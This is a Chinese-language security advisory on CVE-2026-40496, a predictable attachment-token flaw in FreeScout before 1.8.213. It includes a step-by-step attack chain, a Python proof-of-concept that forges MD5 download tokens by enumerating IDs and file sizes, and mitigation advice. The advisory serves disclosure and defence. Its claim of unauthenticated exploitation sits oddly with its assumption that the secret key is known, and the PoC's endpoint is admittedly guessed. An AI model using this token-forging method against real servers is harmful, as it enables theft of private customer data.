CVE-2026-40496 FreeScout 附件令牌可预测导致任意文件下载

漏洞信息

漏洞编号

CVE-2026-40496

漏洞类型

访问控制绕过

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FreeScout

漏洞概述

FreeScout是一款开源自建工单系统。在1.8.213版本之前，其附件下载功能的令牌生成机制存在严重安全缺陷。系统使用MD5哈希算法对“应用密钥+附件ID+文件大小”进行签名，由于附件ID为连续整数且文件大小易于猜测，导致令牌具有可预测性。未经身份认证的远程攻击者可利用此缺陷伪造合法令牌，绕过权限验证直接下载服务器上的任意私有附件，造成敏感信息泄露。

技术细节

该漏洞的核心在于FreeScout生成附件下载令牌的算法过于简单且缺乏足够的随机性。系统计算 `md5(APP_KEY + attachment_id + size)` 作为访问凭证。虽然APP_KEY本身是保密的，但在某些配置下可能泄露，或者攻击者通过其他方式获取。然而，问题的关键在于输入参数的熵值极低：`attachment_id`通常是数据库的自增主键，呈现连续性；`size`即文件大小，攻击者可以通过响应头或常见文件类型进行枚举或小范围暴力破解。由于MD5计算速度非常快，攻击者可以编写脚本，遍历可能的ID和Size组合，生成对应的哈希值。一旦生成的哈希值与目标URL中的令牌匹配，攻击者即可成功伪造请求，在无需登录的情况下获取任意附件，这属于典型的不安全的直接对象引用（IDOR）与弱加密算法结合导致的安全问题。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网站正在使用FreeScout，并尝试获取或猜测应用的APP_KEY（或利用默认配置）。

STEP 2

步骤2：参数枚举

由于附件ID是连续递增的整数，攻击者编写脚本遍历可能的ID范围（如1-10000）。同时，针对每个ID枚举常见的文件大小。

STEP 3

步骤3：令牌伪造

利用获取的APP_KEY、枚举的ID和大小，按照 `md5(APP_KEY + attachment_id + size)` 的公式计算MD5哈希值，生成伪造的下载令牌。

STEP 4

步骤4：数据窃取

向服务器发送带有伪造Token的下载请求。如果服务器返回200状态码，则表示攻击成功，攻击者即可下载私有附件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import hashlib

# Exploit logic for CVE-2026-40496
# Assumption: APP_KEY is known, leaked, or default.
# The token generation logic is: md5(APP_KEY + attachment_id + size)

def generate_token(app_key, attachment_id, size):
    # Concatenate parameters based on the vulnerable logic
    raw_string = f"{app_key}{attachment_id}{size}"
    # Generate MD5 hash
    return hashlib.md5(raw_string.encode()).hexdigest()

def exploit(target_url, app_key, start_id=1, end_id=1000):
    print(f"[*] Starting exploit against {target_url}")
    
    # Iterate through sequential attachment IDs
    for attachment_id in range(start_id, end_id + 1):
        # Common file sizes to brute-force (in bytes)
        # Example sizes: 1KB, 10KB, 100KB, 1MB, 5MB
        common_sizes = [1024, 10240, 102400, 1048576, 5242880]
        
        for size in common_sizes:
            token = generate_token(app_key, attachment_id, size)
            
            # Construct the malicious URL
            # Note: Actual endpoint structure may vary based on FreeScout version
            malicious_url = f"{target_url}/attachment/{attachment_id}/download?token={token}"
            
            print(f"[+] Trying ID: {attachment_id}, Size: {size}, Token: {token}")
            print(f"    URL: {malicious_url}")
            
            # Attacker would send an HTTP request here and check status code (e.g., 200 OK)
            # if response is 200, the download is successful.

if __name__ == "__main__":
    # Configuration
    TARGET = "http://example.com"
    LEAKED_APP_KEY = "base64:SECRET_KEY_HERE=" 
    exploit(TARGET, LEAKED_APP_KEY)

影响范围

FreeScout < 1.8.213

防御指南

临时缓解措施

建议立即升级至FreeScout 1.8.213或更高版本以彻底修复此漏洞。若暂时无法升级，应通过网络防火墙（WAF）限制对附件下载路径的外部访问，仅允许受信任的内网IP或经过严格认证的用户访问，同时监控异常的附件下载行为。